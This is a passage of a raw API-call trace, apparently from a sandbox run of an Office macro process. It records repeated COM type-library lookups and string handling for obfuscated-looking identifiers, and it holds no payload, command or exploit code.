(This=0x665b4b0) returned 0x5 [0068.508] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_MAxkBQDQ", lHashVal=0x101dc9, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.508] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.508] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.508] IUnknown:Release (This=0x665ba50) returned 0xb [0068.508] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc1f0a, cbMultiByte=16, lpWideCharStr=0x144e60, cchWideChar=17 | out: lpWideCharStr="_B_var_MAxkBQDQ") returned 16 [0068.508] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_MAxkBQDQ", lHashVal=0x101dc9, wFlags=0x5, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x4d005f00720061, ppTypeComp=0x42006b00000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x4d005f00720061, ppTypeComp=0x42006b00000000, pDummy=0x0) returned 0x0 [0068.508] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x9, _Src=0x3ba2a36 | out: _Dst=0x145020) returned 0x0 [0068.508] ITypeComp:RemoteBind (in: This=0x665ba60, szName="zkAoAB", lHashVal=0x108ba0, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.508] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2a8a, cbMultiByte=7, lpWideCharStr=0x144ea0, cchWideChar=8 | out: lpWideCharStr="zkAoAB") returned 7 [0068.508] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="zkAoAB", lHashVal=0x108ba0, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.508] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2a8a, cbMultiByte=7, lpWideCharStr=0x144ea0, cchWideChar=8 | out: lpWideCharStr="zkAoAB") returned 7 [0068.508] ITypeComp:RemoteBind (in: This=0x665bd30, szName="zkAoAB", lHashVal=0x108ba0, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.508] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="zkAoAB") returned 0x108ba0 [0068.508] strcpy_s (in: _Dst=0x144e00, _DstSize=0x7, _Src="zkAoAB" | out: _Dst="zkAoAB") returned 0x0 [0068.508] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=7, lpWideCharStr=0x144c50, cchWideChar=7 | out: lpWideCharStr="zkAoAB") returned 7 [0068.508] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.508] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="zkAoAB", lHashVal=0x108ba0, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.508] IUnknown:Release (This=0x665ba50) returned 0xb [0068.509] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.509] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="zkAoAB", lHashVal=0x108ba0, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.509] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.509] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.509] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="zkAoAB", lHashVal=0x108ba0, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.509] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.509] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.509] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="zkAoAB", lHashVal=0x108ba0, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.509] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.509] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2a8a, cbMultiByte=7, lpWideCharStr=0x144ea0, cchWideChar=8 | out: lpWideCharStr="zkAoAB") returned 7 [0068.509] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="zkAoAB", lHashVal=0x108ba0, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.509] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0068.509] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3ba2a8a | out: _Dst=0x67c2d40) returned 0x0 [0068.509] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_zkAoAB") returned 0x10060a [0068.509] strcpy_s (in: _Dst=0x144fb0, _DstSize=0xe, _Src="_B_var_zkAoAB" | out: _Dst="_B_var_zkAoAB") returned 0x0 [0068.509] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=14, lpWideCharStr=0x144e00, cchWideChar=14 | out: lpWideCharStr="_B_var_zkAoAB") returned 14 [0068.509] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.509] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_zkAoAB", lHashVal=0x10060a, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.509] IUnknown:Release (This=0x665ba50) returned 0xb [0068.509] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.509] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_zkAoAB", lHashVal=0x10060a, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.509] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.509] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.509] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_zkAoAB", lHashVal=0x10060a, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.509] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.509] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.509] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_zkAoAB", lHashVal=0x10060a, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.509] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.509] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.509] IUnknown:Release (This=0x665ba50) returned 0xb [0068.510] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc1f3a, cbMultiByte=14, lpWideCharStr=0x144e60, cchWideChar=15 | out: lpWideCharStr="_B_var_zkAoAB") returned 14 [0068.510] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_zkAoAB", lHashVal=0x10060a, wFlags=0x3, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x7a005f00720061, ppTypeComp=0x41006f00000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x7a005f00720061, ppTypeComp=0x41006f00000000, pDummy=0x0) returned 0x0 [0068.510] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x7, _Src=0x3ba2a8a | out: _Dst=0x145020) returned 0x0 [0068.510] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0068.510] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2ab2, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="sABAGA_B") returned 9 [0068.510] ITypeComp:RemoteBind (in: This=0x665ba60, szName="sABAGA_B", lHashVal=0x102e9f, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.510] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2ab2, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="sABAGA_B") returned 9 [0068.510] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="sABAGA_B", lHashVal=0x102e9f, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.510] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2ab2, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="sABAGA_B") returned 9 [0068.510] ITypeComp:RemoteBind (in: This=0x665bd30, szName="sABAGA_B", lHashVal=0x102e9f, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.510] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="sABAGA_B") returned 0x102e9f [0068.510] strcpy_s (in: _Dst=0x144e00, _DstSize=0x9, _Src="sABAGA_B" | out: _Dst="sABAGA_B") returned 0x0 [0068.510] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=9, lpWideCharStr=0x144c50, cchWideChar=9 | out: lpWideCharStr="sABAGA_B") returned 9 [0068.510] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.510] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="sABAGA_B", lHashVal=0x102e9f, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.510] IUnknown:Release (This=0x665ba50) returned 0xb [0068.511] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.511] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="sABAGA_B", lHashVal=0x102e9f, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.511] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.511] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.511] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="sABAGA_B", lHashVal=0x102e9f, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.511] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.511] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.511] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="sABAGA_B", lHashVal=0x102e9f, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.511] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.511] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2ab2, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="sABAGA_B") returned 9 [0068.511] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="sABAGA_B", lHashVal=0x102e9f, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.511] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0068.511] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3ba2ab2 | out: _Dst=0x67c2d40) returned 0x0 [0068.511] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_sABAGA_B") returned 0x100628 [0068.511] strcpy_s (in: _Dst=0x144fb0, _DstSize=0x10, _Src="_B_var_sABAGA_B" | out: _Dst="_B_var_sABAGA_B") returned 0x0 [0068.511] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=16, lpWideCharStr=0x144e00, cchWideChar=16 | out: lpWideCharStr="_B_var_sABAGA_B") returned 16 [0068.511] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.511] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_sABAGA_B", lHashVal=0x100628, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.511] IUnknown:Release (This=0x665ba50) returned 0xb [0068.511] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.511] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_sABAGA_B", lHashVal=0x100628, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.511] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.511] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.511] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_sABAGA_B", lHashVal=0x100628, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.511] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.512] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.512] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_sABAGA_B", lHashVal=0x100628, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.512] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.512] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.512] IUnknown:Release (This=0x665ba50) returned 0xb [0068.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc1f6a, cbMultiByte=16, lpWideCharStr=0x144e60, cchWideChar=17 | out: lpWideCharStr="_B_var_sABAGA_B") returned 16 [0068.512] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_sABAGA_B", lHashVal=0x100628, wFlags=0x3, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x73005f00720061, ppTypeComp=0x47004100000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x73005f00720061, ppTypeComp=0x47004100000000, pDummy=0x0) returned 0x0 [0068.512] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x9, _Src=0x3ba2ab2 | out: _Dst=0x145020) returned 0x0 [0068.512] ITypeComp:RemoteBind (in: This=0x665ba60, szName="NAUA4A", lHashVal=0x10ed22, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2b0a, cbMultiByte=7, lpWideCharStr=0x144ea0, cchWideChar=8 | out: lpWideCharStr="NAUA4A") returned 7 [0068.512] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="NAUA4A", lHashVal=0x10ed22, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2b0a, cbMultiByte=7, lpWideCharStr=0x144ea0, cchWideChar=8 | out: lpWideCharStr="NAUA4A") returned 7 [0068.512] ITypeComp:RemoteBind (in: This=0x665bd30, szName="NAUA4A", lHashVal=0x10ed22, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.512] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="NAUA4A") returned 0x10ed22 [0068.512] strcpy_s (in: _Dst=0x144e00, _DstSize=0x7, _Src="NAUA4A" | out: _Dst="NAUA4A") returned 0x0 [0068.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=7, lpWideCharStr=0x144c50, cchWideChar=7 | out: lpWideCharStr="NAUA4A") returned 7 [0068.512] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.512] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="NAUA4A", lHashVal=0x10ed22, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.513] IUnknown:Release (This=0x665ba50) returned 0xb [0068.513] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.513] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="NAUA4A", lHashVal=0x10ed22, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.513] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.513] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.513] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="NAUA4A", lHashVal=0x10ed22, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.513] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.513] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.513] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="NAUA4A", lHashVal=0x10ed22, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.513] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.513] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2b0a, cbMultiByte=7, lpWideCharStr=0x144ea0, cchWideChar=8 | out: lpWideCharStr="NAUA4A") returned 7 [0068.513] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="NAUA4A", lHashVal=0x10ed22, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.513] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0068.513] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3ba2b0a | out: _Dst=0x67c2d40) returned 0x0 [0068.513] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_NAUA4A") returned 0x10678c [0068.513] strcpy_s (in: _Dst=0x144fb0, _DstSize=0xe, _Src="_B_var_NAUA4A" | out: _Dst="_B_var_NAUA4A") returned 0x0 [0068.513] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=14, lpWideCharStr=0x144e00, cchWideChar=14 | out: lpWideCharStr="_B_var_NAUA4A") returned 14 [0068.513] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.513] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_NAUA4A", lHashVal=0x10678c, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.513] IUnknown:Release (This=0x665ba50) returned 0xb [0068.513] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.513] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_NAUA4A", lHashVal=0x10678c, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.513] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.513] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.513] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_NAUA4A", lHashVal=0x10678c, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.513] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.513] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.513] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_NAUA4A", lHashVal=0x10678c, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.514] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.514] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.514] IUnknown:Release (This=0x665ba50) returned 0xb [0068.514] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc1f9a, cbMultiByte=14, lpWideCharStr=0x144e60, cchWideChar=15 | out: lpWideCharStr="_B_var_NAUA4A") returned 14 [0068.514] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_NAUA4A", lHashVal=0x10678c, wFlags=0x3, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x4e005f00720061, ppTypeComp=0x34004100000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x4e005f00720061, ppTypeComp=0x34004100000000, pDummy=0x0) returned 0x0 [0068.514] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x7, _Src=0x3ba2b0a | out: _Dst=0x145020) returned 0x0 [0068.514] ITypeComp:RemoteBind (in: This=0x665ba60, szName="FAUkkDwA", lHashVal=0x10bd57, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.514] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2ade, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="FAUkkDwA") returned 9 [0068.514] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="FAUkkDwA", lHashVal=0x10bd57, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.514] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2ade, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="FAUkkDwA") returned 9 [0068.514] ITypeComp:RemoteBind (in: This=0x665bd30, szName="FAUkkDwA", lHashVal=0x10bd57, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.514] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="FAUkkDwA") returned 0x10bd57 [0068.514] strcpy_s (in: _Dst=0x144e00, _DstSize=0x9, _Src="FAUkkDwA" | out: _Dst="FAUkkDwA") returned 0x0 [0068.514] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=9, lpWideCharStr=0x144c50, cchWideChar=9 | out: lpWideCharStr="FAUkkDwA") returned 9 [0068.514] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.514] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="FAUkkDwA", lHashVal=0x10bd57, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.514] IUnknown:Release (This=0x665ba50) returned 0xb [0068.514] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.514] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="FAUkkDwA", lHashVal=0x10bd57, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.514] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.514] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.515] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="FAUkkDwA", lHashVal=0x10bd57, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.515] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.515] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.515] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="FAUkkDwA", lHashVal=0x10bd57, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.515] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.515] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2ade, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="FAUkkDwA") returned 9 [0068.515] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="FAUkkDwA", lHashVal=0x10bd57, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 